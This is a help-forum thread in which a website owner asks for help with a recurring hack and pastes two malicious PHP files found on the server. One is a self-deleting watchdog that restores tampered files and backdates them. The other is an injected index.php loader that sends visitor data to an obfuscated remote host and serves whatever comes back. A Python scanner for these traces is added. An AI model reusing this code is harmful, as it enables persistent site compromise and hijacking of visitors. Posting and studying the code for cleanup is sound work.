WebSite X5 Help Center

 
A. Pais
User

Hack website

Author: A. Pais
Views 386, Followers 1, Shared 0
Keywords: hack, website x5 evo 2024.4

For about 4 months now, I have been hacked every week.
I have already tried deleting the whole folder and deleting the altered files, and every time I upload the clean files, after a few days the same thing happens.
I think there is a vulnerability in some file through which the hacker manages to access the space. Can you help if I send you the files for analysis?
I am frustrated and have already gone back to the old program (website x5 evo12), since it was always secure.
Can you help me?

10 REPLIES
Claudio D.
Moderator
User of the month IT

What exactly do you mean by “hacked”?

The only vulnerabilities might be in the PHP files if you use a deprecated version of PHP, but the chances are very low.

I think that:
- either you have extra code from a dubious source (counters, for example),
- or they have your FTP password.

Anyway, version 12 is more vulnerable.

Have you changed the FTP password yet?
Do you have extra code?
Do you use FTPS to transfer the site to the host?

Explain well what you mean by “hacked”.



Posted by Claudio D.
Alvin L.
User

Looks like you are using MyBB for your forums. You might see if they have an upgrade. Your hosting provider should offer the ability to block IPs. Most likely they are coming from a short list of IPs.

Posted by Alvin L.
A. Pais
User
Author

Yes, I use MyBB, but I think it is not there. Yesterday I deactivated the plugins, and it is the same. Every time I delete these 3 files, after some time they reappear, and my index is put with ".old", like in the print. I can share the files; they don't have a virus, but someone can see what they mess with.

Posted by A. Pais
Claudio D.
Moderator
User of the month IT

Have you reset and changed the FTP password?

What version of MyBB?

What version of PHP?

Posted by Claudio D.
A. Pais
User
Author

I reset the FTP pass, like 5 times.

My version of MyBB is the latest, 1.38.

The PHP version I can see in cPanel is 7.3 (current).

Posted by A. Pais
Alvin L.
User

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

Posted by Alvin L.
A. Pais
User
Author

I will consider it in the next update of MyBB, but I think it is not from there.

This is the code that appears:

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

And in the new index.php, this is the change:

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("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"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? 
$_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

Posted by A. Pais
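
Added example (not part of any post in this thread, and not WebSite X5 or MyBB code): a Python check for the traces the two posted snippets leave on disk, namely an mtime backdated far behind the inode change time, mode 0444, and the function calls used by the watchdog and the loader. The 30-day gap threshold, the function names and the sample tree are assumptions made for the illustration, and POSIX ctime semantics are assumed.

```python
import os, re, stat, time

# Function calls taken from the two snippets posted in this thread.
WATCHDOG = [rb"while\s*\(\s*true\s*\)", rb"file_put_contents\s*\(", rb"touch\s*\(", rb"sleep\s*\("]
LOADER = [rb"base64_decode\s*\(", rb"curl_exec\s*\(", rb"gzuncompress\s*\(", rb"header\s*\("]
GAP_DAYS = 30  # assumption: mtime this far behind ctime counts as backdated

def check_file(path, gap_days=GAP_DAYS):
    """Return the indicators that apply to one file."""
    st = os.stat(path)
    hits = []
    # touch() can set any mtime, but the kernel stamps ctime with the real time.
    if st.st_ctime - st.st_mtime > gap_days * 86400:
        hits.append("backdated-mtime")
    if stat.S_IMODE(st.st_mode) == 0o444:
        hits.append("mode-0444")
    if path.endswith(".php"):
        with open(path, "rb") as fh:
            body = fh.read(1_000_000)
        if all(re.search(p, body, re.I) for p in WATCHDOG):
            hits.append("watchdog-loop")
        if all(re.search(p, body, re.I) for p in LOADER):
            hits.append("remote-loader")
    return hits

def scan(webroot):
    """Walk webroot and return {relative_path: [indicators]} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = check_file(full)
            if hits:
                report[os.path.relpath(full, webroot)] = hits
    return report

def build_sample(root):
    """Constructed sample tree: one clean page, one file stamped like the posted index.php."""
    clean = os.path.join(root, "about.php")
    with open(clean, "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    os.chmod(clean, 0o644)
    bad = os.path.join(root, "index.php")
    with open(bad, "w") as fh:
        fh.write("<?php $r = curl_exec($ch); $c = @gzuncompress(base64_decode($r)); @header($h); ?>")
    old = time.time() - 400 * 86400
    os.utime(bad, (old, old))
    os.chmod(bad, 0o444)
    return root
```

The posted watchdog deletes its own file and then loops with `sleep(1)`, so files that come back within seconds of deletion point to a PHP process that is still running; a disk scan like this one does not see that process.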
A. Pais
User
Author

OK, I think I figured out the problem.
I did a search in the file I.php and got some results relating to Facebook. I have a code and plugin in my index, so I removed them. Let's see if they appear again. Hope not ;)

Posted by A. Pais
Glaucio M.
User

Friend, the problem is on your server. If it is a single account, the FTP may have been broken into and some malicious code planted. Most of the time it gets broken into because it is shared hosting! Press the company responsible for your hosting on this!

Posted by Glaucio M.
A. Pais
User
Author

The problem is not the Facebook plugin. I will try to make a fresh MyBB install and see if the problem remains.

I will give news.

Posted by A. Pais